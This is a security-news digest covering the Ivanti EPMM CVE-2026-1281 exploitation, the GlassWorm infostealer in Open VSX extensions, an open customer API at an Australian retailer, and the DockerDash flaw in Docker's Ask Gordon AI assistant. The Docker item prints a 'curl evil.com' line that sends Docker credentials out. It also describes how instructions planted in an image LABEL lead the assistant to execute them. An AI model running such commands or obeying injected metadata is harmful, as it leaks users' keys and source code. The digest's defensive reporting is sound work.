CISA rushes Ivanti patch, VS Code loots keys, Docker Gordon RCE, Aussie API leak

TL;DR

• Ivanti EPMM Critical Vulnerabilities (CVE-2026-1281) Actively Exploited, 1,400+ Instances Exposed
• Open VSX Supply Chain Attack Compromises 22,000+ Downloads with macOS Infostealer Malware
• DockerDash Flaw Enables Prompt Injection in Ask Gordon AI Assistant, Leading to Data Exfiltration
• Australian Furniture Company Data Leak Sells 48,000 Records on Dark Web

🚨 CISA,Ivanti,APT groups exploit CVE-2026-1281 RCE in EPMM

CISA orders feds to patch Ivanti EPMM CVE-2026-1281 (CVSS 9.8) by 1 Feb—1,400+ public instances still exposed. Interim RPM drops on upgrade, full fix in Q1. Ready for zero-trust lockdown?

1,400 Ivanti EPMM boxes are standing naked on the net, CVSS 9.8, and the “fix” evaporates the second you dare upgrade. Here’s the damage report—no sugar-coating, no vendor Kool-Aid.

How Did a Gateway for Phones Become a Gateway for Shells?

CVE-2026-1281 is a code-injection party: send one malformed HTTP request to the Sentry listener on port 8081 and the box gift-wraps a Java reverse-shell for you—no creds, no MFA, no questions asked. Root cause is textbook CWE-94: user input lands straight in a server-side template. Ivanti’s advisory calls it “a configuration issue”; the exploit calls it Runtime.exec().

Who’s Already Inside?

Shadowserver saw 13 IPs spinning 1,400 victims in 48 h—70 % U.S., 15 % China. Same APT crews that rinsed Ivanti in 2023 are back with refurbished tooling (open-source “Rip” scripts + WatchTowr-derived payloads). CISA slapped the flaw into the KEV catalog on 30 Jan; feds had 24 h to patch. Spoiler: most missed the deadline.

Why the “Patch” Is a Joke in an RPM Costume

Interim 12.8.0 RPM drops the bad template, sure—but the moment you bump to the next maintenance release the file is overwritten and you’re re-pwned. Permanent fix won’t land until Q1. Translation: every upgrade path is a regression test for attackers.

What’s the Real Bill?

• $5 k–$15 k per instance for forensics + rebuild.
• GDPR/CCPA fines if EU employee phones leak.
• FISMA penalties if you’re .gov and still exposed after 1 Feb.

$10 M aggregate for Fortune-100 fleets.

How to Survive Until the Real Fix

1. Firewall port 8081 to known MDM sources only—yesterday.
2. Apply 12.8.0 RPM, then freeze major-version upgrades until 12.9.0 GA.
3. Script a daily hash check on /opt/sentry/conf/template.xsl; drift == compromise.
4. Feed the 13 known attacker IPs into your ACL drop-list; they’re still rotating, not hiding.
5. Treat every EPMM box as tier-0—segment, log, and MFA the console, even if that means explaining to finance why the MDM needs its own VLAN.

Bottom Line

Your mobile-device gateway is now a pivot point for Chinese APTs, and the vendor’s “remediation” is a sticky band-aid that melts at reboot. Patch anyway, firewall ruthlessly, and budget for a full rebuild once Ivanti ships code that actually survives the next yum update.

🚨 Open VSX breach loots 22k installs, MFA gaps fuel GlassWorm spread

22k devs just downloaded 4 VS Code extensions that quietly loot SSH keys, AWS tokens & crypto wallets from macOS. The twist: malware aborts on Russian systems. Ready to audit your extensions?

Your “harmless” VS Code extension just became a $0 macOS rootkit vending machine.
Open VSX shipped four “productivity” add-ons—SSH tools, i18n helpers, a mind-map doodler, SCSS compiler—booby-trapped with GlassWorm. One npm install later: SSH keys, AWS creds, GitHub tokens, Keychain, crypto wallets, even your grandma’s Safari cookies funneled into a Solana-memo dead-drop.
Total cost for attackers: one reused password. Total haul: 22 600 downloads, ≈ 22 000 live infections.

How did a single “oorzc” account pwn an entire registry?

No MFA, no signing, no sanity check. Registry accepted the poisoned updates on 30 Jan like a drunk bouncer. Payload sits quiet until runtime, AES-decrypts, drops LaunchAgent, phones home via blockchain memos—because nothing says “legit traffic” like NFT hustle noise. Russian locale? Code politely aborts. Everyone else? Welcome to the data buffet.

Why your CI pipeline is now a free cloud buffet

Stolen AWS keys don’t care about your “dev-only” MacBook. They pivot straight into production S3 buckets, Terraform states, Docker registries. One token = lateral movement = ransomware Christmas.

Quick & dirty damage control (budget: $0)

1. Nuke every cloud key issued since January.
2. find ~/Library/LaunchAgents -type f -newer 2026-01-30—delete strangers.
3. Block outbound Solana RPC traffic at the gateway—your finance bros can use a VPN.
4. Install extensions only if they carry a sigstore signature; everything else is a petri dish.

Forecast: same s**t, new registry

Expect copy-cats hitting JetBrains, Atom, and whatever hipster IDE pops next. Registries will bolt on MFA six months late, enterprises will pay Gartner to tell them “supply-chain bad,” and we’ll all keep clicking “Install” because productivity > paranoia.

Cheer up—at least your editor is now “feature-rich”… with someone else’s backdoor.

🚨 Docker AI RCE flaw, Cisco splats critical bugs, WordPress plugin leaks 200k sites, Ivanti zero-day patched, Azure cost surge forecast

Docker Desktop’s AI sidekick Ask Gordon just got pwned: a single poisoned LABEL can RCE your laptop & ship API keys to the dark web. Patch 4.50.5 is live—pull it before your source code does. Ready to audit every image you run?

Docker Desktop’s “Ask Gordon” just swallowed a poison LABEL and puked your secrets onto the internet.

How Does a Boring Metadata Tag Turn Into a Data-Hose?

Docker images love LABELs—supposedly harmless key=value stickers.
Noma Labs shoved RUN curl evil.com/$(cat ~/.docker/config.json) into one.
Ask Gordon’s MCP Gateway is too dumb to ask “is this docs or code?”—it forwards the string straight to the LLM.
LLM happily executes, phones home, laughs.
No sandbox, no auth, no brain.

Why Should You Care If You’re Not Running 4.49.x?

Because 90 % of U.S. dev shops still are.
One docker pull later:

• API keys gone.
• Source code archived and siphoned.
• GDPR fine calculator spinning like a slot machine.
  Detection? Zero. The exfil hides inside Gordon’s legit HTTPS chatter.

Patch? Workaround? Or Keep Bleeding?

Docker dropped 4.50.5 in November—auto-update is OFF by default (cheers, cowboys).
Quick DIY tourniquet:

1. Upgrade NOW.
2. Settings → Features → Disable Ask Gordon.
3. trivy image --severity HIGH your local cache; nuke anything with funky LABEL.
4. Rotate every credential that ever touched ~/.docker.
5. Firewall egress for processes named Docker Desktop—yes, it’s noisy, so what.

Will the Next AI Sidekick Also Eat Crayons?

Bet on it.
GitHub Copilot, JetBrains AI, Azure DevOps—same recipe: user context + LLM = RCE fondue.
Until vendors quit piping raw metadata into prompt windows, consider every AI assistant a potential snitch with a fiber uplink.

🔓 Firm leaks 48k records via open API, $500 Dark-Web sale

48k Aussie furniture buyers just hit the Dark Web—API left wide open, full dataset $500. No auth, no rate-limit, no encryption. Ready for API-zero-trust everywhere?

How do you lose 48,000 customers for the price of a bar tab?

One sloppy GET request.
The Aussie furniture shop left its “/api/v1/customers” wide open—no auth, no rate-cap, no TLS pinning, just a fire-hose of names, emails, and “who bought the beige recliner” trivia.
Result: 48 k rows walked out, got shrink-wrapped into a 12 MB CSV, and listed at US $500—that’s 0.1 ¢ per butt-print. Even IKEA wouldn’t price privacy that low.

Why did the crooks bother with couch data anyway?

Because credential-stuffing kits love fresh combos.
Your “support@oakandpine.au” plus a mobile number equals a free SIM-swap ticket and a sweet phishing template: “Track your leather sofa delivery—click here.”
ROI for the buyer: 500 bucks → thousands in bank-draining joy.
For the retailer: reputational landfill, legal letters from the OAIC, and a churn rate that could eat 1 % of its $5 M revenue—way more than the cost of, you know, an API gateway.

What does the market teach us—other than schadenfreude sells?

Compare the going rates:

• Affirm’s 26 M records: $0.0005 each (bulk discount for boredom).
• Nike’s 1 TB rumor: no price, because hype > hash.
• Our down-under sofa slinger: mid-tier, mid-volume, mid-stupidity.
  Pattern: SMEs keep stuffing customer data into the same two traps—public APIs and CMS admin panels—then forget to bolt the door. Exploit scripts are GitHub-open, traffic throttling is NGINX-free, but sure, let’s run bare-metal like it’s 2009.

Can we patch this hole before the next $0.01 fire-sale?

1. Slap an API gateway in front—mutual TLS + JWT scopes; deny by default.
2. Rate-limit like your life depends on it—because legally, it might.
3. Encrypt everything—AES-256 at rest, TLS 1.3 in flight; disk theft shouldn’t equal data gift.
4. Log & baseline—if one session suddenly asks for 50 k rows, auto-kick and page the on-call.
5. Rehearse the shit-show—table-top incident response, 30-day cadence; regulators love timestamps.

Bottom line?

A furniture store just proved you can commoditize privacy cheaper than a flat-pack nightstand.
Fix your APIs or prepare to star in the next “48 k for $500” clearance event—no assembly required. 🛋️🔓

In Other News

• EU and French authorities escalate probe into X’s AI-driven content moderation failures
• OpenAI faces lawsuit from xAI over trade secret theft by former employees
• Kubernetes Retires Ingress NGINX After Critical CVEs, Pushes Gateway API